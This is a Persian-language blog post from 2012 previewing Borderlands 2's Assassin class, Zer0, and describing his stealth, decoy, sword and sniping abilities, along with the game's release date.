تبلیغات
بازیکده - ملاقات با آدمکش

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

پنجشنبه 11 اسفند 1390-12:34 ب.ظکلاس Assassin در حقیقت همان نینجا است. او در میدان نبرد حرکت می کند و با شمشیر خود یا به صورت مخفیانه و یا به صورت کاملاً اکشن دشمنان را از وسط نصف می کند. این کلاس به درد کسانی می خورد که می خواهند خیلی قوی ضربه بزنند و البته خیلی قوی هم ضربه بخورند. همانند تمام کلاس های مناسب Borderlands 2، این کلاس هم خیلی خوب می تواند با سبک شما هماهنگ شود. حملات نزدیک و یا شلیک با اسلحه Snipe از قابلیت های او است و Gearbox می گوید این تنها کلاسی است که سلاح های آن کاملاً اختصاصی و تعریف شده هستند. طراحی شخصیت ها بر مبنای اصول پایه ای کلاس ها است.

مثلاً Gunzerker با دو دست خود اسلحه می گیرد و یا Commando می تواند تیربار روی زمین جاسازی کند و Assassin هم می تواند مخفیانه وارد قلمروی دشمن شود. شخصیت این کلاس Zer0 نام دارد که شما می توانید در بخش Level-Up قابلیت های مخفی-کاری او را افزایش دهید که اتفاقاً این بخش در گیم پلی هم خیلی خوب اجرا می شوند و المان های مخفی-کاری و زمان بندی در آن دخیل است. اما بگذارید کمی در مورد Zer0 صحبت کنیم. جرمی کوک (Jeramy Cook) طراح هنری Gearbox می گوید: "نکته جالب شخصیت Zer0 این است که شما نمی دانید او از کجا آمده و کلاً چه کسی هست. او در حقیقت باعث خلق یک معما می شود و هدف ما هم دقیقاً همین است. اسم واقعی او Zer0 نیست، ولی همه او را به این اسم صدا می کنند، چون هر بار که او کسی را به قتل می رساند، علامت صفر را روی صورت او می گذارد."

بعضی وقت ها او وارد حالت 50 Seconds می شود که در این بخش به مدت 50 ثانیه هیچ صدمه ای نمی بیند. اگر چه در بیشتر تریلرها Zer0 را با شمشیر می بینیم، ولی واقعیت این است که شمشیر سلاح قابل انتخابی نیست که شما همانند اسلحه آن را انتخاب کنید. در حقیقت Melee Combatهای بازی با استفاده از این شمشیر است، ولی برعکس سایرین، این بخش هم دارای Upgrade است. البته این قابلیت ویژه در شخصیت های دیگر هم هست، ولی به شکل دیگر. ممکن است کسی قدرت مین گذاری بجای قدرت شمشیر زنی داشته باشد. نزدیک شدن به دشمن برای Assassin کار مشکلی نیست، چون او مهارت این کار را دارد و مهارت اصلی او حقه است.

او می تواند کپی خود را به میدان مبارزه بفرستد و در حالیکه دشمن مشغول مبارزه با نسخه تقلبی او است، وی می تواند به شکار آرام دشمنان خود بپردازد. وقتی وارد بخش Stealth Mode می شوید، می توانید به صورت مخفیانه دشمنان را با یک ضربه نابود کنید، ولی وقتی در این بخش نباشید، ضربه قدرت کمتری دارد. این بخش به درد کشتن بعضی از Bossها می خورد و یا مثلاً در بخش Co-op در حالیکه دوست شما مشغول تیراندازی به دشمن است، می توانید از پشت به دشمنان به صورت مخفیانه حمله کنید. این کلاس خیلی تک هدفی تر از کلاس های دیگر است و بیشتر برنامه ریزی شما روی کشتن یک نفر خواهد بود. یکی دیگر از قابلیت های Zer0 نحوه دید او است.

شما می توانید دشمنان را با رنگ متفاوت ببینید و آن قسمت های بدنشان که امتیاز بیشتری به شما می دهند را هدف بگیرید. می توانید با اسلحه تک تیرانداز خود این قسمت ها را هدف بگیرید و یا با حمله ناگهانی شمشیر، امتیازات بیشتری بگیرید. اگر موفق به این کار شوید، خواهید دید که بقیه اعضای گروهتان چه حسادتی به این ضربه امتیازی شما خواهند کرد. قابلیت دیگر Zer0 بخشی است که Be Like Water نام دارد. در این قسمت هر چه با استفاده از شمشیر به دشمن حمله کنید، برای مدتی نیروی سلاح های گرم شما بیشتر می شود و هر چه با این سلاح ها شلیک کنید، نیروی شمشیر برای مدتی زیاد می شود. این موضوع باعث می شود که بازیکن دائم بین این دو بخش سوئیچ کند و دیوانه وار با گلوله ها و تیغه شمشیر خود برقصد. اگر به طور مثال دشمنی Shield قوی دارد. شما می توانید نمونه هولوگرافیک خود را به وسط مقر آن ها بفرستید و آن را منفجر کنید. Borderlands 2 در تاریخ 18 سپتامبر امسال عرضه خواهد شد.

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >